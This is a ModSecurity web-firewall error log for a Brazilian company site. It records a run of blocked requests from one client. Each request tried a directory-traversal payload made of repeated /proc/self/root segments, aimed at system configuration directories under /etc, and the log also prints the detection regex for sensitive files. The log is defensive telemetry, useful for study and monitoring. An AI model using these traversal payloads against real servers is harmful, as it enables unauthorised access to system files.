[Mon Mar 16 09:40:25.142781 2026] [:error] [pid 32654:tid 140411632822016] [client 74.7.243.203:54086] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6OQlT9VtDQc7bgUyZogAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:26.277949 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.243.203:54092] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6Opqj1wV0Si-OkefW7QAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:27.678988 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.243.203:54106] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6O3bQATo66fKoS7w6SAAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:29.029184 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.243.203:54108] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6PY6lpbStxTqkSktcVQAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:30.391539 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.243.203:53922] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6Po6lpbStxTqkSktcWgAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:40:31.775058 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:53938] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6P_9ocpUE4ed4uDzaXwAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:33.120128 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.243.203:53942] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6QZqj1wV0Si-OkefW9AAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:40:34.400858 2026] [:error] [pid 21946:tid 140411599251200] [client 74.7.243.203:53958] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6QnbQATo66fKoS7w6TQAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:40:35.833952 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.243.203:53966] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6Q5qj1wV0Si-OkefW-QAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:37.036787 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.243.203:53972] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6RY6lpbStxTqkSktcXQAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:38.325610 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.243.203:53986] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6RrABkC4fWIHEf8HYZwAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:40:39.679354 2026] [:error] [pid 10709:tid 140411733534464] [client 74.7.243.203:53994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6RxXjF1vJNtV6CWrmTQAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:41.920071 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.243.203:38912] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6SQlT9VtDQc7bgUyZpwAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:41.924013 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.228.16:44058] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf6Sf9ocpUE4ed4uDzaZAAAAgw"]
[Mon Mar 16 09:40:43.445998 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.243.203:38928] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6S3bQATo66fKoS7w6UAAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:40:44.819917 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.243.203:38934] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6TLysWC90G-1nBrAyugAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:40:45.935532 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.243.203:38948] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6TdSswJuvopo3lOhNZwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:47.258914 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.243.203:38960] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6TwlT9VtDQc7bgUyZqAAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:48.559034 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:38974] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6UI6lpbStxTqkSktcXgAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:49.840030 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.243.203:38978] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6URXjF1vJNtV6CWrmUwAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:50.999138 2026] [:error] [pid 21946:tid 140411683178240] [client 74.7.243.203:51960] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6UnbQATo66fKoS7w6UwAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:53.408773 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:51970] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6VLysWC90G-1nBrAywwAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:40:54.683866 2026] [:error] [pid 11972:tid 140411574073088] [client 74.7.243.203:51972] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 